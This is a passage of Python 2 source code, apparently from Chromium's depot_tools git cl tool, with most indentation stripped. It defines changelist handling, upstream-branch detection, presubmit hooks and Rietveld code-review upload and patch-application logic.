assert codereview in _CODEREVIEW_IMPLEMENTATIONS
cls = _CODEREVIEW_IMPLEMENTATIONS[codereview]
self._codereview = codereview
self._codereview_impl = cls(self, **kwargs)
return
# Automatic selection based on issue number set for a current branch.
# Rietveld takes precedence over Gerrit.
assert not self.issue
# Whether we find issue or not, we are doing the lookup.
self.lookedup_issue = True
for codereview, cls in _CODEREVIEW_IMPLEMENTATIONS.iteritems():
setting = cls.IssueSetting(self.GetBranch())
issue = RunGit(['config', setting], error_ok=True).strip()
if issue:
self._codereview = codereview
self._codereview_impl = cls(self, **kwargs)
self.issue = int(issue)
return
# No issue is set for this branch, so decide based on repo-wide settings.
return self._load_codereview_impl(
codereview='gerrit' if settings.GetIsGerrit() else 'rietveld',
**kwargs)
def IsGerrit(self):
return self._codereview == 'gerrit'
def GetCCList(self):
"""Return the users cc'd on this CL.
Return is a string suitable for passing to gcl with the --cc flag.
"""
if self.cc is None:
base_cc = settings.GetDefaultCCList()
more_cc = ','.join(self.watchers)
self.cc = ','.join(filter(None, (base_cc, more_cc))) or ''
return self.cc
def GetCCListWithoutDefault(self):
"""Return the users cc'd on this CL excluding default ones."""
if self.cc is None:
self.cc = ','.join(self.watchers)
return self.cc
def SetWatchers(self, watchers):
"""Set the list of email addresses that should be cc'd based on the changed
files in this CL.
"""
self.watchers = watchers
def GetBranch(self):
"""Returns the short branch name, e.g. 'master'."""
if not self.branch:
branchref = GetCurrentBranchRef()
if not branchref:
return None
self.branchref = branchref
self.branch = ShortBranchName(self.branchref)
return self.branch
def GetBranchRef(self):
"""Returns the full branch name, e.g. 'refs/heads/master'."""
self.GetBranch() # Poke the lazy loader.
return self.branchref
def ClearBranch(self):
"""Clears cached branch data of this object."""
self.branch = self.branchref = None
@staticmethod
def FetchUpstreamTuple(branch):
"""Returns a tuple containing remote and remote ref,
e.g. 'origin', 'refs/heads/master'
"""
remote = '.'
upstream_branch = RunGit(['config', 'branch.%s.merge' % branch],
error_ok=True).strip()
if upstream_branch:
remote = RunGit(['config', 'branch.%s.remote' % branch]).strip()
else:
upstream_branch = RunGit(['config', 'rietveld.upstream-branch'],
error_ok=True).strip()
if upstream_branch:
remote = RunGit(['config', 'rietveld.upstream-remote']).strip()
else:
# Fall back on trying a git-svn upstream branch.
if settings.GetIsGitSvn():
upstream_branch = settings.GetSVNBranch()
else:
# Else, try to guess the origin remote.
remote_branches = RunGit(['branch', '-r']).split()
if 'origin/master' in remote_branches:
            # Fall back on origin/master if it exists.
remote = 'origin'
upstream_branch = 'refs/heads/master'
elif 'origin/trunk' in remote_branches:
# Fall back on origin/trunk if it exists. Generally a shared
# git-svn clone
remote = 'origin'
upstream_branch = 'refs/heads/trunk'
else:
DieWithError(
'Unable to determine default branch to diff against.\n'
'Either pass complete "git diff"-style arguments, like\n'
' git cl upload origin/master\n'
'or verify this branch is set up to track another \n'
'(via the --track argument to "git checkout -b ...").')
return remote, upstream_branch
def GetCommonAncestorWithUpstream(self):
upstream_branch = self.GetUpstreamBranch()
if not BranchExists(upstream_branch):
DieWithError('The upstream for the current branch (%s) does not exist '
'anymore.\nPlease fix it and try again.' % self.GetBranch())
return git_common.get_or_create_merge_base(self.GetBranch(),
upstream_branch)
def GetUpstreamBranch(self):
if self.upstream_branch is None:
remote, upstream_branch = self.FetchUpstreamTuple(self.GetBranch())
      if remote != '.':
upstream_branch = upstream_branch.replace('refs/heads/',
'refs/remotes/%s/' % remote)
upstream_branch = upstream_branch.replace('refs/branch-heads/',
'refs/remotes/branch-heads/')
self.upstream_branch = upstream_branch
return self.upstream_branch
def GetRemoteBranch(self):
if not self._remote:
remote, branch = None, self.GetBranch()
seen_branches = set()
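      # Walk up the chain of tracked branches until a real remote (or a ref
      # under refs/remotes) is found. The while/else below only guesses a
      # remote when the loop stops because a branch was seen twice.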
while branch not in seen_branches:
seen_branches.add(branch)
remote, branch = self.FetchUpstreamTuple(branch)
branch = ShortBranchName(branch)
if remote != '.' or branch.startswith('refs/remotes'):
break
else:
remotes = RunGit(['remote'], error_ok=True).split()
if len(remotes) == 1:
remote, = remotes
elif 'origin' in remotes:
remote = 'origin'
logging.warning('Could not determine which remote this change is '
'associated with, so defaulting to "%s". This may '
'not be what you want. You may prevent this message '
'by running "git svn info" as documented here: %s',
                          remote,
GIT_INSTRUCTIONS_URL)
else:
logging.warn('Could not determine which remote this change is '
'associated with. You may prevent this message by '
'running "git svn info" as documented here: %s',
GIT_INSTRUCTIONS_URL)
branch = 'HEAD'
if branch.startswith('refs/remotes'):
self._remote = (remote, branch)
elif branch.startswith('refs/branch-heads/'):
self._remote = (remote, branch.replace('refs/', 'refs/remotes/'))
else:
self._remote = (remote, 'refs/remotes/%s/%s' % (remote, branch))
return self._remote
def GitSanityChecks(self, upstream_git_obj):
"""Checks git repo status and ensures diff is from local commits."""
if upstream_git_obj is None:
if self.GetBranch() is None:
print('ERROR: unable to determine current branch (detached HEAD?)',
file=sys.stderr)
else:
print('ERROR: no upstream branch', file=sys.stderr)
return False
# Verify the commit we're diffing against is in our current branch.
upstream_sha = RunGit(['rev-parse', '--verify', upstream_git_obj]).strip()
common_ancestor = RunGit(['merge-base', upstream_sha, 'HEAD']).strip()
if upstream_sha != common_ancestor:
print('ERROR: %s is not in the current branch. You may need to rebase '
'your tracking branch' % upstream_sha, file=sys.stderr)
return False
# List the commits inside the diff, and verify they are all local.
commits_in_diff = RunGit(
['rev-list', '^%s' % upstream_sha, 'HEAD']).splitlines()
code, remote_branch = RunGitWithCode(['config', 'gitcl.remotebranch'])
remote_branch = remote_branch.strip()
if code != 0:
_, remote_branch = self.GetRemoteBranch()
commits_in_remote = RunGit(
['rev-list', '^%s' % upstream_sha, remote_branch]).splitlines()
common_commits = set(commits_in_diff) & set(commits_in_remote)
if common_commits:
print('ERROR: Your diff contains %d commits already in %s.\n'
'Run "git log --oneline %s..HEAD" to get a list of commits in '
'the diff. If you are using a custom git flow, you can override'
' the reference used for this check with "git config '
'gitcl.remotebranch <git-ref>".' % (
len(common_commits), remote_branch, upstream_git_obj),
file=sys.stderr)
return False
return True
def GetGitBaseUrlFromConfig(self):
"""Return the configured base URL from branch.<branchname>.baseurl.
Returns None if it is not set.
"""
return RunGit(['config', 'branch.%s.base-url' % self.GetBranch()],
error_ok=True).strip()
def GetGitSvnRemoteUrl(self):
"""Return the configured git-svn remote URL parsed from git svn info.
Returns None if it is not set.
"""
# URL is dependent on the current directory.
data = RunGit(['svn', 'info'], cwd=settings.GetRoot())
if data:
keys = dict(line.split(': ', 1) for line in data.splitlines()
if ': ' in line)
return keys.get('URL', None)
return None
def GetRemoteUrl(self):
"""Return the configured remote URL, e.g. 'git://example.org/foo.git/'.
Returns None if there is no remote.
"""
remote, _ = self.GetRemoteBranch()
url = RunGit(['config', 'remote.%s.url' % remote], error_ok=True).strip()
# If URL is pointing to a local directory, it is probably a git cache.
if os.path.isdir(url):
url = RunGit(['config', 'remote.%s.url' % remote],
error_ok=True,
cwd=url).strip()
return url
def GetIssue(self):
"""Returns the issue number as a int or None if not set."""
if self.issue is None and not self.lookedup_issue:
issue = RunGit(['config',
self._codereview_impl.IssueSetting(self.GetBranch())],
error_ok=True).strip()
self.issue = int(issue) or None if issue else None
self.lookedup_issue = True
return self.issue
def GetIssueURL(self):
"""Get the URL for a particular issue."""
issue = self.GetIssue()
if not issue:
return None
return '%s/%s' % (self._codereview_impl.GetCodereviewServer(), issue)
def GetDescription(self, pretty=False):
if not self.has_description:
if self.GetIssue():
self.description = self._codereview_impl.FetchDescription()
self.has_description = True
if pretty:
wrapper = textwrap.TextWrapper()
wrapper.initial_indent = wrapper.subsequent_indent = ' '
return wrapper.fill(self.description)
return self.description
def GetPatchset(self):
"""Returns the patchset number as a int or None if not set."""
if self.patchset is None and not self.lookedup_patchset:
patchset = RunGit(['config', self._codereview_impl.PatchsetSetting()],
error_ok=True).strip()
self.patchset = int(patchset) or None if patchset else None
self.lookedup_patchset = True
return self.patchset
def SetPatchset(self, patchset):
"""Set this branch's patchset. If patchset=0, clears the patchset."""
patchset_setting = self._codereview_impl.PatchsetSetting()
if patchset:
RunGit(['config', patchset_setting, str(patchset)])
self.patchset = patchset
else:
RunGit(['config', '--unset', patchset_setting],
stderr=subprocess2.PIPE, error_ok=True)
self.patchset = None
def SetIssue(self, issue=None):
"""Set this branch's issue. If issue isn't given, clears the issue."""
issue_setting = self._codereview_impl.IssueSetting(self.GetBranch())
codereview_setting = self._codereview_impl.GetCodereviewServerSetting()
if issue:
self.issue = issue
RunGit(['config', issue_setting, str(issue)])
codereview_server = self._codereview_impl.GetCodereviewServer()
if codereview_server:
RunGit(['config', codereview_setting, codereview_server])
else:
# Reset it regardless. It doesn't hurt.
config_settings = [issue_setting, self._codereview_impl.PatchsetSetting()]
for prop in (['last-upload-hash'] +
self._codereview_impl._PostUnsetIssueProperties()):
config_settings.append('branch.%s.%s' % (self.GetBranch(), prop))
for setting in config_settings:
RunGit(['config', '--unset', setting], error_ok=True)
self.issue = None
self.patchset = None
def GetChange(self, upstream_branch, author):
if not self.GitSanityChecks(upstream_branch):
DieWithError('\nGit sanity check failure')
root = settings.GetRelativeRoot()
if not root:
root = '.'
absroot = os.path.abspath(root)
# We use the sha1 of HEAD as a name of this change.
name = RunGitWithCode(['rev-parse', 'HEAD'])[1].strip()
# Need to pass a relative path for msysgit.
try:
files = scm.GIT.CaptureStatus([root], '.', upstream_branch)
except subprocess2.CalledProcessError:
DieWithError(
('\nFailed to diff against upstream branch %s\n\n'
'This branch probably doesn\'t exist anymore. To reset the\n'
'tracking branch, please run\n'
' git branch --set-upstream %s trunk\n'
'replacing trunk with origin/master or the relevant branch') %
(upstream_branch, self.GetBranch()))
issue = self.GetIssue()
patchset = self.GetPatchset()
if issue:
description = self.GetDescription()
else:
# If the change was never uploaded, use the log messages of all commits
# up to the branch point, as git cl upload will prefill the description
# with these log messages.
args = ['log', '--pretty=format:%s%n%n%b', '%s...' % (upstream_branch)]
description = RunGitWithCode(args)[1].strip()
if not author:
author = RunGit(['config', 'user.email']).strip() or None
return presubmit_support.GitChange(
name,
description,
absroot,
files,
issue,
patchset,
author,
upstream=upstream_branch)
def UpdateDescription(self, description):
self.description = description
return self._codereview_impl.UpdateDescriptionRemote(description)
def RunHook(self, committing, may_prompt, verbose, change):
"""Calls sys.exit() if the hook fails; returns a HookResults otherwise."""
try:
return presubmit_support.DoPresubmitChecks(change, committing,
verbose=verbose, output_stream=sys.stdout, input_stream=sys.stdin,
default_presubmit=None, may_prompt=may_prompt,
rietveld_obj=self._codereview_impl.GetRieveldObjForPresubmit(),
gerrit_obj=self._codereview_impl.GetGerritObjForPresubmit())
except presubmit_support.PresubmitFailure as e:
DieWithError(
('%s\nMaybe your depot_tools is out of date?\n'
'If all fails, contact maruel@') % e)
def CMDPatchIssue(self, issue_arg, reject, nocommit, directory):
"""Fetches and applies the issue patch from codereview to local branch."""
if isinstance(issue_arg, (int, long)) or issue_arg.isdigit():
parsed_issue_arg = _ParsedIssueNumberArgument(int(issue_arg))
else:
# Assume url.
parsed_issue_arg = self._codereview_impl.ParseIssueURL(
urlparse.urlparse(issue_arg))
if not parsed_issue_arg or not parsed_issue_arg.valid:
DieWithError('Failed to parse issue argument "%s". '
'Must be an issue number or a valid URL.' % issue_arg)
return self._codereview_impl.CMDPatchWithParsedIssue(
parsed_issue_arg, reject, nocommit, directory)
def CMDUpload(self, options, git_diff_args, orig_args):
"""Uploads a change to codereview."""
if git_diff_args:
# TODO(ukai): is it ok for gerrit case?
base_branch = git_diff_args[0]
else:
if self.GetBranch() is None:
DieWithError('Can\'t upload from detached HEAD state. Get on a branch!')
# Default to diffing against common ancestor of upstream branch
base_branch = self.GetCommonAncestorWithUpstream()
git_diff_args = [base_branch, 'HEAD']
    # Make sure we are authenticated to the codereview site before running
    # potentially expensive hooks. This is a fast, best-effort check; the
    # codereview site can still reject the authentication during the actual
    # upload.
self._codereview_impl.EnsureAuthenticated(force=options.force)
# Apply watchlists on upload.
change = self.GetChange(base_branch, None)
watchlist = watchlists.Watchlists(change.RepositoryRoot())
files = [f.LocalPath() for f in change.AffectedFiles()]
if not options.bypass_watchlists:
self.SetWatchers(watchlist.GetWatchersForPaths(files))
if not options.bypass_hooks:
if options.reviewers or options.tbr_owners:
# Set the reviewer list now so that presubmit checks can access it.
change_description = ChangeDescription(change.FullDescriptionText())
change_description.update_reviewers(options.reviewers,
options.tbr_owners,
change)
change.SetDescriptionText(change_description.description)
hook_results = self.RunHook(committing=False,
may_prompt=not options.force,
verbose=options.verbose,
change=change)
if not hook_results.should_continue():
return 1
if not options.reviewers and hook_results.reviewers:
options.reviewers = hook_results.reviewers.split(',')
if self.GetIssue():
latest_patchset = self.GetMostRecentPatchset()
local_patchset = self.GetPatchset()
if (latest_patchset and local_patchset and
local_patchset != latest_patchset):
print('The last upload made from this repository was patchset #%d but '
'the most recent patchset on the server is #%d.'
% (local_patchset, latest_patchset))
print('Uploading will still work, but if you\'ve uploaded to this '
'issue from another machine or branch the patch you\'re '
'uploading now might not include those changes.')
ask_for_data('About to upload; enter to confirm.')
print_stats(options.similarity, options.find_copies, git_diff_args)
ret = self.CMDUploadChange(options, git_diff_args, change)
if not ret:
git_set_branch_value('last-upload-hash',
RunGit(['rev-parse', 'HEAD']).strip())
# Run post upload hooks, if specified.
if settings.GetRunPostUploadHook():
presubmit_support.DoPostUploadExecuter(
change,
self,
settings.GetRoot(),
options.verbose,
sys.stdout)
# Upload all dependencies if specified.
if options.dependencies:
print()
print('--dependencies has been specified.')
print('All dependent local branches will be re-uploaded.')
print()
# Remove the dependencies flag from args so that we do not end up in a
# loop.
orig_args.remove('--dependencies')
ret = upload_branch_deps(self, orig_args)
return ret
def SetCQState(self, new_state):
"""Update the CQ state for latest patchset.
Issue must have been already uploaded and known.
"""
assert new_state in _CQState.ALL_STATES
assert self.GetIssue()
return self._codereview_impl.SetCQState(new_state)
# Forward methods to codereview specific implementation.
def CloseIssue(self):
return self._codereview_impl.CloseIssue()
def GetStatus(self):
return self._codereview_impl.GetStatus()
def GetCodereviewServer(self):
return self._codereview_impl.GetCodereviewServer()
def GetApprovingReviewers(self):
return self._codereview_impl.GetApprovingReviewers()
def GetMostRecentPatchset(self):
return self._codereview_impl.GetMostRecentPatchset()
def __getattr__(self, attr):
# This is because lots of untested code accesses Rietveld-specific stuff
# directly, and it's hard to fix for sure. So, just let it work, and fix
# on a case by case basis.
return getattr(self._codereview_impl, attr)
class _ChangelistCodereviewBase(object):
"""Abstract base class encapsulating codereview specifics of a changelist."""
def __init__(self, changelist):
self._changelist = changelist # instance of Changelist
def __getattr__(self, attr):
# Forward methods to changelist.
# TODO(tandrii): maybe clean up _GerritChangelistImpl and
# _RietveldChangelistImpl to avoid this hack?
return getattr(self._changelist, attr)
def GetStatus(self):
"""Apply a rough heuristic to give a simple summary of an issue's review
or CQ status, assuming adherence to a common workflow.
Returns None if no issue for this branch, or specific string keywords.
"""
raise NotImplementedError()
def GetCodereviewServer(self):
"""Returns server URL without end slash, like "https://codereview.com"."""
raise NotImplementedError()
def FetchDescription(self):
"""Fetches and returns description from the codereview server."""
raise NotImplementedError()
def GetCodereviewServerSetting(self):
"""Returns git config setting for the codereview server."""
raise NotImplementedError()
@classmethod
def IssueSetting(cls, branch):
return 'branch.%s.%s' % (branch, cls.IssueSettingSuffix())
@classmethod
def IssueSettingSuffix(cls):
"""Returns name of git config setting which stores issue number for a given
branch."""
raise NotImplementedError()
def PatchsetSetting(self):
"""Returns name of git config setting which stores issue number."""
raise NotImplementedError()
def _PostUnsetIssueProperties(self):
"""Which branch-specific properties to erase when unsettin issue."""
raise NotImplementedError()
def GetRieveldObjForPresubmit(self):
# This is an unfortunate Rietveld-embeddedness in presubmit.
# For non-Rietveld codereviews, this probably should return a dummy object.
raise NotImplementedError()
def GetGerritObjForPresubmit(self):
# None is valid return value, otherwise presubmit_support.GerritAccessor.
return None
def UpdateDescriptionRemote(self, description):
"""Update the description on codereview site."""
raise NotImplementedError()
def CloseIssue(self):
"""Closes the issue."""
raise NotImplementedError()
def GetApprovingReviewers(self):
"""Returns a list of reviewers approving the change.
Note: not necessarily committers.
"""
raise NotImplementedError()
def GetMostRecentPatchset(self):
"""Returns the most recent patchset number from the codereview site."""
raise NotImplementedError()
def CMDPatchWithParsedIssue(self, parsed_issue_arg, reject, nocommit,
directory):
"""Fetches and applies the issue.
Arguments:
parsed_issue_arg: instance of _ParsedIssueNumberArgument.
reject: if True, reject the failed patch instead of switching to 3-way
merge. Rietveld only.
nocommit: do not commit the patch, thus leave the tree dirty. Rietveld
only.
directory: switch to directory before applying the patch. Rietveld only.
"""
raise NotImplementedError()
@staticmethod
def ParseIssueURL(parsed_url):
"""Parses url and returns instance of _ParsedIssueNumberArgument or None if
failed."""
raise NotImplementedError()
def EnsureAuthenticated(self, force):
"""Best effort check that user is authenticated with codereview server.
Arguments:
force: whether to skip confirmation questions.
"""
raise NotImplementedError()
def CMDUploadChange(self, options, args, change):
"""Uploads a change to codereview."""
raise NotImplementedError()
def SetCQState(self, new_state):
"""Update the CQ state for latest patchset.
Issue must have been already uploaded and known.
"""
raise NotImplementedError()
class _RietveldChangelistImpl(_ChangelistCodereviewBase):
def __init__(self, changelist, auth_config=None, rietveld_server=None):
super(_RietveldChangelistImpl, self).__init__(changelist)
assert settings, 'must be initialized in _ChangelistCodereviewBase'
settings.GetDefaultServerUrl()
self._rietveld_server = rietveld_server
self._auth_config = auth_config
self._props = None
self._rpc_server = None
def GetCodereviewServer(self):
if not self._rietveld_server:
# If we're on a branch then get the server potentially associated
# with that branch.
if self.GetIssue():
rietveld_server_setting = self.GetCodereviewServerSetting()
if rietveld_server_setting:
self._rietveld_server = gclient_utils.UpgradeToHttps(RunGit(
['config', rietveld_server_setting], error_ok=True).strip())
if not self._rietveld_server:
self._rietveld_server = settings.GetDefaultServerUrl()
return self._rietveld_server
def EnsureAuthenticated(self, force):
"""Best effort check that user is authenticated with Rietveld server."""
if self._auth_config.use_oauth2:
authenticator = auth.get_authenticator_for_host(
self.GetCodereviewServer(), self._auth_config)
if not authenticator.has_cached_credentials():
raise auth.LoginRequiredError(self.GetCodereviewServer())
def FetchDescription(self):
issue = self.GetIssue()
assert issue
try:
return self.RpcServer().get_description(issue).strip()
except urllib2.HTTPError as e:
if e.code == 404:
DieWithError(
('\nWhile fetching the description for issue %d, received a '
'404 (not found)\n'
'error. It is likely that you deleted this '
'issue on the server. If this is the\n'
'case, please run\n\n'
' git cl issue 0\n\n'
'to clear the association with the deleted issue. Then run '
'this command again.') % issue)
else:
DieWithError(
'\nFailed to fetch issue description. HTTP error %d' % e.code)
except urllib2.URLError as e:
print('Warning: Failed to retrieve CL description due to network '
'failure.', file=sys.stderr)
return ''
def GetMostRecentPatchset(self):
return self.GetIssueProperties()['patchsets'][-1]
def GetPatchSetDiff(self, issue, patchset):
return self.RpcServer().get(
'/download/issue%s_%s.diff' % (issue, patchset))
def GetIssueProperties(self):
if self._props is None:
issue = self.GetIssue()
if not issue:
self._props = {}
else:
self._props = self.RpcServer().get_issue_properties(issue, True)
return self._props
def GetApprovingReviewers(self):
return get_approving_reviewers(self.GetIssueProperties())
def AddComment(self, message):
return self.RpcServer().add_comment(self.GetIssue(), message)
def GetStatus(self):
"""Apply a rough heuristic to give a simple summary of an issue's review
or CQ status, assuming adherence to a common workflow.
Returns None if no issue for this branch, or one of the following keywords:
* 'error' - error from review tool (including deleted issues)
* 'unsent' - not sent for review
* 'waiting' - waiting for review
* 'reply' - waiting for owner to reply to review
* 'lgtm' - LGTM from at least one approved reviewer
* 'commit' - in the commit queue
* 'closed' - closed
"""
if not self.GetIssue():
return None
try:
props = self.GetIssueProperties()
except urllib2.HTTPError:
return 'error'
if props.get('closed'):
# Issue is closed.
return 'closed'
if props.get('commit') and not props.get('cq_dry_run', False):
# Issue is in the commit queue.
return 'commit'
try:
reviewers = self.GetApprovingReviewers()
except urllib2.HTTPError:
return 'error'
if reviewers:
# Was LGTM'ed.
return 'lgtm'
messages = props.get('messages') or []
# Skip CQ messages that don't require owner's action.
while messages and messages[-1]['sender'] == COMMIT_BOT_EMAIL:
if 'Dry run:' in messages[-1]['text']:
messages.pop()
elif 'The CQ bit was unchecked' in messages[-1]['text']:
# This message always follows prior messages from CQ,
# so skip this too.
messages.pop()
else:
        # This is probably a CQ message warranting user attention.
break
if not messages:
# No message was sent.
return 'unsent'
if messages[-1]['sender'] != props.get('owner_email'):
# Non-LGTM reply from non-owner and not CQ bot.
return 'reply'
return 'waiting'
def UpdateDescriptionRemote(self, description):
return self.RpcServer().update_description(
        self.GetIssue(), description)
def CloseIssue(self):
return self.RpcServer().close_issue(self.GetIssue())
def SetFlag(self, flag, value):
"""Patchset must match."""
if not self.GetPatchset():
DieWithError('The patchset needs to match. Send another patchset.')
try:
return self.RpcServer().set_flag(
self.GetIssue(), self.GetPatchset(), flag, value)
except urllib2.HTTPError as e:
if e.code == 404:
DieWithError('The issue %s doesn\'t exist.' % self.GetIssue())
if e.code == 403:
DieWithError(
('Access denied to issue %s. Maybe the patchset %s doesn\'t '
'match?') % (self.GetIssue(), self.GetPatchset()))
raise
def RpcServer(self):
"""Returns an upload.RpcServer() to access this review's rietveld instance.
"""
if not self._rpc_server:
self._rpc_server = rietveld.CachingRietveld(
self.GetCodereviewServer(),
self._auth_config or auth.make_auth_config())
return self._rpc_server
@classmethod
def IssueSettingSuffix(cls):
return 'rietveldissue'
def PatchsetSetting(self):
"""Return the git setting that stores this change's most recent patchset."""
return 'branch.%s.rietveldpatchset' % self.GetBranch()
def GetCodereviewServerSetting(self):
"""Returns the git setting that stores this change's rietveld server."""
branch = self.GetBranch()
if branch:
return 'branch.%s.rietveldserver' % branch
return None
def _PostUnsetIssueProperties(self):
"""Which branch-specific properties to erase when unsetting issue."""
return ['rietveldserver']
def GetRieveldObjForPresubmit(self):
return self.RpcServer()
def SetCQState(self, new_state):
props = self.GetIssueProperties()
if props.get('private'):
DieWithError('Cannot set-commit on private issue')
if new_state == _CQState.COMMIT:
self.SetFlag('commit', '1')
elif new_state == _CQState.NONE:
self.SetFlag('commit', '0')
else:
raise NotImplementedError()
def CMDPatchWithParsedIssue(self, parsed_issue_arg, reject, nocommit,
directory):
# TODO(maruel): Use apply_issue.py
# PatchIssue should never be called with a dirty tree. It is up to the
# caller to check this, but just in case we assert here since the
# consequences of the caller not checking this could be dire.
assert(not git_common.is_dirty_git_tree('apply'))
assert(parsed_issue_arg.valid)
self._changelist.issue = parsed_issue_arg.issue
if parsed_issue_arg.hostname:
self._rietveld_server = 'https://%s' % parsed_issue_arg.hostname
if (isinstance(parsed_issue_arg, _RietveldParsedIssueNumberArgument) and
parsed_issue_arg.patch_url):
assert parsed_issue_arg.patchset
patchset = parsed_issue_arg.patchset
patch_data = urllib2.urlopen(parsed_issue_arg.patch_url).read()
else:
patchset = parsed_issue_arg.patchset or self.GetMostRecentPatchset()
patch_data = self.GetPatchSetDiff(self.GetIssue(), patchset)
# Switch up to the top-level directory, if necessary, in preparation for
# applying the patch.
top = settings.GetRelativeRoot()
if top:
os.chdir(top)
# Git patches have a/ at the beginning of source paths. We strip that out
# with a sed script rather than the -p flag to patch so we can feed either
# Git or svn-style patches into the same apply command.
# re.sub() should be used but flags=re.MULTILINE is only in python 2.7.
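    # e.g. '--- a/foo/bar.py' becomes '--- foo/bar.py' (and '+++ b/...'
    # likewise), which is why the patch is applied with -p0 below.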
try:
patch_data = subprocess2.check_output(
['sed', '-e', 's|^--- a/|--- |; s|^+++ b/|+++ |'], stdin=patch_data)
except subprocess2.CalledProcessError:
      DieWithError('Git patch munging failed.')
logging.info(patch_data)
# We use "git apply" to apply the patch instead of "patch" so that we can
# pick up file adds.
# The --index flag means: also insert into the index (so we catch adds).
cmd = ['git', 'apply', '--index', '-p0']
if directory:
cmd.extend(('--directory', directory))
if reject:
cmd.append('--reject')
elif IsGitVersionAtLeast('1.7.12'):
cmd.append('--3way')
try:
subprocess2.check_call(cmd, env=GetNoGitPagerEnv(),
stdin=patch_data, stdout=subprocess2.VOID)
except subprocess2.CalledProcessError:
print('Failed to apply the patch')
return 1
# If we had an issue, commit the current state and register the issue.
if not nocommit:
RunGit(['commit', '-m', (self.GetDescription() + '\n\n' +
'patch from issue %(i)s at patchset '
'%(p)s (http://crrev.com/%(i)s#ps%(p)s)'
% {'i': self.GetIssue(), 'p': patchset})])
self.SetIssue(self.GetIssue())
self.SetPatchset(patchset)
print('Committed patch locally.')
else:
print('Patch applied to index.')
return 0
@staticmethod
def ParseIssueURL(parsed_url):
if not parsed_url.scheme or not parsed_url.scheme.startswith('http'):
return None
# Typical url: https://domain/<issue_number>[/[other]]
    match = re.match(r'/(\d+)(/.*)?$', parsed_url.path)
if match:
return _RietveldParsedIssueNumberArgument(
issue=int(match.group(1)),
hostname=parsed_url.netloc)
# Rietveld patch: https://domain/download/issue<number>_<patchset>.diff
match = re.match(r'/download/issue(\d+)_(\d+).diff$', parsed_url.path)
if match:
return _RietveldParsedIssueNumberArgument(
issue=int(match.group(1)),
patchset=int(match.group(2)),
hostname=parsed_url.netloc,
patch_url=gclient_utils.UpgradeToHttps(parsed_url.geturl()))
return None
def CMDUploadChange(self, options, args, change):
"""Upload the patch to Rietveld."""
upload_args = ['--assume_yes'] # Don't ask about untracked files.
upload_args.extend(['--server', self.GetCodereviewServer()])
upload_args.extend(auth.auth_config_to_command_options(self._auth_config))
if options.emulate_svn_auto_props:
upload_args.append('--emulate_svn_auto_props')
change_desc = None
if options.email is not None:
upload_args.extend(['--email', options.email])
if self.GetIssue():
if options.title:
upload_args.extend(['--title', options.title])
if options.message:
upload_args.extend(['--message', options.message])
upload_args.extend(['--issue', str(self.GetIssue())])
print('This branch is associated with issue %s. '
'Adding patch to that issue.' % self.GetIssue())
else:
if options.title:
upload_args.extend(['--title', options.title])
message = (options.title or options.message or
CreateDescriptionFromLog(args))
change_desc = ChangeDescription(message)
if options.reviewers or options.tbr_owners:
change_desc.update_reviewers(options.reviewers,
options.tbr_owners,
change)
if not options.force:
change_desc.prompt()
if not change_desc.description:
print('Description is empty; aborting.')
return 1
upload_args.extend(['--message', change_desc.description])
if change_desc.get_reviewers():
upload_args.append('--reviewers=%s' % ','.join(
change_desc.get_reviewers()))
if options.send_mail:
if not change_desc.get_reviewers():
DieWithError("Must specify reviewers to send email.")
upload_args.append('--send_mail')
    # We check options.private before applying rietveld.private, on the
    # assumption that when rietveld.private is set, rietveld.cc lists only
    # addresses we may send private CLs to. rietveld.cc should therefore be
    # ignored only when --private is passed explicitly on the command line.
if options.private:
logging.warn('rietveld.cc is ignored since private flag is specified. '
'You need to review and add them manually if necessary.')
cc = self.GetCCListWithoutDefault()
else:
cc = self.GetCCList()
cc = ','.join(filter(None, (cc, ','.join(options.cc))))
if cc:
upload_args.extend(['--cc', cc])
if options.private or settings.GetDefaultPrivateFlag() == "True":
upload_args.append('--private')
upload_args.extend(['--git_similarity', str(options.similarity)])
if not options.find_copies:
upload_args.extend(['--git_no_find_copies'])
# Include the upstream repo's URL in the change -- this is useful for
# projects that have their source spread across multiple repos.
remote_url = self.GetGitBaseUrlFromConfig()
if not remote_url:
if settings.GetIsGitSvn():
remote_url = self.GetGitSvnRemoteUrl()
else:
if self.GetRemoteUrl() and '/' in self.GetUpstreamBranch():
remote_url = '%s@%s' % (self.GetRemoteUrl(),
self.GetUpstreamBranch().split('/')[-1])
if remote_url:
upload_args.extend(['--base_url', remote_url])
remote, remote_branch = self.GetRemoteBranch()
target_ref = GetTargetRef(remote, remote_branch, options.target_branch,
settings.GetPendingRefPrefix())
if target_ref:
upload_args.extend(['--target_ref', target_ref])
# Look for dependent patchsets. See crbug.com/480453 for more details.
remote, upstream_branch = self.FetchUpstreamTuple(self.GetBranch())
upstream_branch = ShortBranchName(upstream_branch)
    if remote == '.':
# A local branch is being tracked.
local_branch = upstream_branch
if settings.GetIsSkipDependencyUpload(local_branch):
print()
print('Skipping dependency patchset upload because git config '
'branch.%s.skip-deps-uploads is set to True.' % local_branch)
print()
else:
auth_config = auth.extract_auth_config_from_options(options)
branch_cl = Changelist(branchref='refs/heads/'+local_branch,
auth_config=auth_config)
branch_cl_issue_url = branch_cl.GetIssueURL()
branch_cl_issue = branch_cl.GetIssue()
branch_cl_patchset = branch_cl.GetPatchset()
if branch_cl_issue_url and branch_cl_issue and branch_cl_patchset:
upload_args.extend(
['--depends_on_patchset', '%s:%s' % (
branch_cl_issue, branch_cl_patchset)])
print(
'\n'
'The current branch (%s) is tracking a local branch (%s) with '
'an associated CL.\n'
'Adding %s/#ps%s as a dependency patchset.\n'
'\n' % (self.GetBranch(), local_branch, branch_cl_issue_url,
branch_cl_patchset))
project = settings.GetProject()
if project:
upload_args.extend(['--project', project])
if options.cq_dry_run:
upload_args.extend(['--cq_dry_run'])
try:
upload_args = ['upload'] + upload_args + args
logging.info('upload.RealMain(%s)', upload_args)
issue, patchset = upload.RealMain(upload_args)
issue = int(issue)
patchset = int(patchset)
except KeyboardInterrupt:
sys.exit(1)
except:
# If we got an exception after the user typed a description for their
# change, back up the description before re-raising.
if change_desc:
backup_path = os.path.expanduser(DESCRIPTION_BACKUP_FILE)
print('\nGot exception while uploading -- saving description to %s\n' %
backup_path)
        with open(backup_path, 'w') as backup_file:
          backup_file.write(change_desc.description)
raise
if not self.GetIssue():
self.SetIssue(issue)
self.SetPatchset(patchset)
if options.use_commit_queue:
self.SetCQState(_CQState.COMMIT)
return 0
class _GerritChangelistImpl(_ChangelistCodereviewBase):
def __init__(self, changelist, auth_config=None):
# auth_config is Rietveld thing, kept here to preserve interface only.
super(_GerritChangelistImpl, self).__init__(changelist)
self._change_id = None
